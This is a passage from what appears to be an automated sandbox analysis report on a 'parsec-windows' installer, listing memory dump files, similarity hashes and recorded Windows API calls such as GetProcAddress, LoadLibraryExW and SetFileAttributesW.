                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: InitializeMessageSendUninitialize
                              • String ID:
                              • API String ID: 2896919175-0
                              • Opcode ID: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                              • Instruction ID: 6be4ff692d487ef8b3e25caebddd25c5d55207980f196ef2193ccf2f8785d180
                              • Opcode Fuzzy Hash: 373f90d4a1babe4f1a04baa381ba9309e44634cfc63d647d34b32aa976a59a0d
                              • Instruction Fuzzy Hash: B3F0F0765006009AE6115B95A901BA677A8EBD4316F49883AEF88632E0CB365C418A1C
                              APIs
                              • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                • Part of subcall function 0040689A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406900
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                              • String ID:
                              • API String ID: 2547128583-0
                              • Opcode ID: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                              • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                              • Opcode Fuzzy Hash: 6f78d3fdf53352f122fdb8e7e1f438bdfac4fae158339a91a146711bf240c1a4
                              • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                              APIs
                              • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                              • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                              • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                              APIs
                              • CloseHandle.KERNEL32(FFFFFFFF,00403A5E,?), ref: 00403B1D
                              Strings
                              • C:\Users\user\AppData\Local\Temp\nsj258A.tmp\, xrefs: 00403B31
                              Memory Dump Source
                              • Source File: 0000000D.00000002.2494211679.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000D.00000002.2494185786.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494242114.0000000000408000.00000002.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000040A000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042C000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.000000000042F000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000431000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000436000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494270258.0000000000440000.00000004.00000001.01000000.0000000A.sdmp
                              • Associated: 0000000D.00000002.2494510338.0000000000465000.00000002.00000001.01000000.0000000A.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_parsec-windows.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID: C:\Users\user\AppData\Local\Temp\nsj258A.tmp\
                              • API String ID: 2962429428-3659257028
                              • Opcode ID: e86ec88962d2cddd060eb64ec5e150871475ae72b9f2b14f7d4b77a190cc5563
                              • Instruction ID: 74b342ff74dc5917d60848dc34610585f5de2c5243f802b65b47dd8438b48b4d
                              • Opcode Fuzzy Hash: e86ec88962d2cddd060eb64ec5e150871475ae72b9f2b14f7d4b77a190cc5563
                              • Instruction Fuzzy Hash: 5EC0123050470056D1646F749E4FE153B64AB4073EB600325B0F9B10F1CB3C5759895D